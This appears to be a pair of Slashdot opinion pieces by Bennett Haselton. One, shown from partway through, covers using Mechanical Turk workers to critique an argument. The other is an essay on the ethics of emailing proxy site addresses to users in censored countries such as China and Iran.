The response from a lot of workers who responded to this HIT was that... I lost them. Each of them identified the first statement in the list that they disagreed with, as required by the HIT, but many commented that the whole thing was phrased confusingly. There was no clear winner for the first statement that people disagreed with, but several people picked #3 and #4, arguing some version of "People under 18 have less developed judgment." (I still say that doesn't matter, because you're talking about comparing a person under 18 who smokes, with a person over 18 who smokes, and their judgment in both cases is the same, etc.) So this particular experiment failed -- it didn't make it easier to persuade people by formulating the argument as a series of steps, and it also didn't lead to any agreement on what was the Achilles' Heel of the argument itself.
However I think the general idea, of using Mechanical Turk to find sparring partners, may be useful to a lot of people. If you were interested in publishing some kind of persuasive argument, you could use an Amazon HIT to have readers compare several different versions of the same argument and identify the one that they thought was most convincing. If you were feeling more philosophical and simply wanted to know if your argument was correct, you could pay people to look for flaws in it (and here is where the mathematical phrasing could come in handy). If you're crafting an argument for public consumption, you could even have HIT workers build up your argument for you -- start with a position and have them come up with reasons supporting that position -- although to me that feels like a cheapening of the debate process that crosses the line, because you're not even trying to reason your way to a conclusion, instead starting with the conclusion you want and then working backwards (not that this isn't what a lot of debaters do anyway!). My own interest would be to see next if certain types of arguments are more likely to persuade people who are more mathematically inclined (by asking respondents to indicate how well they did at math in school). Perhaps arguments with flowery language are more likely to appeal to people who were English majors, while arguments spelled out as a series of logical steps are more likely to appeal to people who look at things in a mathematical way (also known as the "real" or "right" way of looking at things).
Maybe my preference for the controlled, user-reimbursed process of "debating" that is enabled by Mechanical Turk, has to do with a lifelong focus on bottom-line results: Decide what the result is, and judge the process by how well it brings about that result. I don't think debate and discussion should be like soccer, valued for the fun and the exercise; I think a good debate should actually get somewhere, persuading the participants or the listeners of a new point of view that builds on their old one, or else the debate has failed. If paying HIT workers kills the "spirit" of a good debate but helps achieve the goal, then so much the better. On the other hand, we'll never run out of people who enjoy the process of debating and arguing for its own sake, and will continue to debate things into the ground without anybody paying them. Hey look, here come some of them now!...
-
Should We Spam Proxies to China?
Frequent Slashdot Contributor Bennett Haselton is back with a story about fighting censorship with spam. He starts "Is it OK to send unsolicited e-mail to users in China, Iran, and other censored countries, telling them about new proxy sites for getting around Internet censorship? I hasten to add that I have NOT done this, am not planning on doing it and would not have any idea how to go about it anyway. Between the various companies that offer proxy services, I don't know of anyone who is doing it (no, not even people who swore me to secrecy about it). But I think the question involves ethical issues that would not apply to most discussions of spam." Hit that big link below to read the rest of his words.
Lest there be any doubt, I hate spam, getting about 10,000 of them a week with no way to filter them without blocking at least some of my important mail as well; I've tried suing some spammers mostly without success, and humbly proposed one anti-spam algorithm which caught on like wildfire, if the wildfire were spreading through a... rainforest, in the... rain. But I am not against spam a priori (Latin for "unless they are telling me I need to add extra inches"), I'm against spam because that follows from other principles, and in some situations there is some question as to whether those principles still apply. (It is not as simplistic as saying that it is OK to spam "for the greater good". Stay with me!)
Getting back to basics: Why is spam a problem? Because the cost of receiving a message, however minor, is more than the benefits, which are usually microscopic considering the probability that a typical recipient would buy what they're selling. Take a small cost that exceeds a small benefit, multiply by millions of messages per day, and the cost exceeds the benefit by about $70 billion per year.
But, just as a thought experiment, could you conceive of a kind of spam that would not be a nuisance? Suppose you sent an e-mail to millions of people offering them free $20 bills. And you actually followed through and sent the money to anybody who claimed the offer. Then the conventional argument against spam no longer applies, because the e-mails are benefitting people more than they're costing them. It's hard to think of any real-life examples, but if you had sent out mass e-mails telling people about the refund checks for anybody who had bought a CD (it was real, I got my $13.86 in the mail in 2004), I probably wouldn't have come to your house to egg your windows.
"Aha!" some spammer is thinking, "my product does benefit people more than the e-mail costs them! I can help them refinance their homes at a low rate, to take out money they can multiply many times with my new stock tip, and then spend at my friend Tiffanee's new site to help pay her way towards her physics degree!" Wait. Let's just say that you're offering some miracle product at a low price, conferring some huge benefit on each person who buys it. The only costs of spreading your bounty to the world, are whatever advertising costs are incurred in getting the word out. But if your product is really the miracle you say it is, then the benefits to people (even after subtracting the price they paid for it), exceed the costs of the advertising.
Then you have several choices. You can spam to advertise the product. In this case, the costs of the advertising are passed on to unwilling recipients. But if the benefits your product confers are greater than the cost of getting people's attention, then you've still arguably done more good than harm to the world, even if the net effect on some individual people was harmful (on annoyed recipients who didn't end up buying your product). By forcing the advertising costs on other people, you've saved that much more money; you can pocket that benefit yourself, or if you pass on the savings in the form of reduced prices (which you may have to do in a competitive market anyway), you've basically transferred that much benefit by stealing it from the spam recipients and distributing it to your customers. So the main benefit to the world was the wonderfulness of your product, and on top of that, you stole some small benefit from a large number of people and redistributed it to other people, which has no positive or negative net effect.
But, because the benefits of the product outweigh the costs of the advertising, that means in a mostly-free country where your product is legal, you can also buy advertisements to get people's attention, pass the costs on to the customers in the form of slightly higher prices, and have benefits for them left over (otherwise they wouldn't still buy what you're selling). The customers still get the major benefit, the benefit of owning your awesome product. What's missing in this case is the small extra benefit that they were getting before, from you stealing from all the spam recipients and passing the savings on to them.
So for that reason, spammers are prohibited from saying "The benefits of my products exceed the costs of people's attention span to read about it, so it's OK for me to spam", by the reply: "If the benefits really exceed the costs, then you can buy advertising to tell people about it like everyone else."
But now the big question: Would that argument still hold if you wanted to advertise proxies to people in China and Iran?
It doesn't seem that you could use conventional channels to advertise proxies to Chinese and Iranian users. If you bought ads on Google AdSense or a similar ad-serving network, China might threaten to block all ads served from that network unless they started screening out ads for anti-censorship services (especially in the case of Google, which seems to comply with most Chinese self-censorship demands). Then there's the question of how to charge Chinese and Iranian users even small amounts for the services. It would not be a good idea to have the charges show up on their credit cards issued by Chinese banks. Paying small amounts with PayPal would be a little bit better since the charge would simply show up from "PayPal", without revealing the recipient. And since all traffic to the PayPal site is encrypted over SSL, Chinese censors wouldn't be able to detect or block users who were paying to circumvent the Great Firewall, unless they blocked all traffic to the PayPal site. But could PayPal be leaned on to provide the identities of Chinese users who were paying for circumvention services, under threat of having their site blocked otherwise? And the biggest impediment of all would be that once you start charging even $1 for a service, there's a huge dropoff in people willing to sign up, even if they would have to spend much more than $1 worth of effort to find a free alternative somewhere else.
So, if circumvention services provide enough benefit to Chinese users, maybe spamming proxy sites would do more good than harm, and if the lack of freedom in the country means that you could not sell or advertise the services to Chinese users by conventional means, maybe that means spamming the proxy locations would be the only way to do this.
Reading over this, I just realized that if you also believed that pot was beneficial to society, this could also justify spamming to advertise pot. I expect we'll all start getting marijuana spam just as soon as the pothead reading this gets around to it... on, like Tuesday... maybe. Just make sure they don't really get their act together enough to get pot legalized, because if that happens, they lose their rationale for spamming to advertise it! (Thinking about the pot question more seriously, I'd say that if the government banned sales and advertisements of something beneficial like milk, then spamming to advertise milk would be a good thing. The only real argument against spamming for pot is that it isn't as beneficial as milk.)
So that's the mathematical argument in a nutshell:
1. Spam is bad because the costs to society are greater than the benefits. This would not be the case if you were spamming to advertise something whose benefits were greater than the costs of the spam.
2. However, in a mostly-free country where your product is legal to sell, #1 should never be used to justify spamming, because if the benefits of your product are really greater than the costs of the advertising, you can pay for the advertising, add the costs on to the cost of the product, and still have benefits left over to split between the seller and the customer.
3. #2 is not true in non-free countries like China, in which case if a product conferred more benefits than the costs of the spam but was not legal to sell, it might be OK to spam it.
Perhaps this logic is flawed, and I'm sure some people will tell me why they think so. The other question is whether these circumvention services really provide as much benefit to the Chinese and Iranians as those of us who run the services would like to believe. Earlier I argued that the real obstacle to most anti-censorship services is apathy on the part of the target audience, and that it was an unpleasant surprise, when I found some Chinese users on MSN Messenger to ask for help with some technical issue, to find that most of them either supported the Chinese government's censorship or didn't care enough to do anything about it. So for proxy spam to be defensible, it should -- come on, all together now, I can't believe I'm quoting the members of the industry that is the bane of my existence -- include an unsubscribe link that users can click to stop receiving any further e-mails. And a postal return address! Because who could have any cause to complain about an unsolicited e-mail that includes the sender's full mailing address in the footer?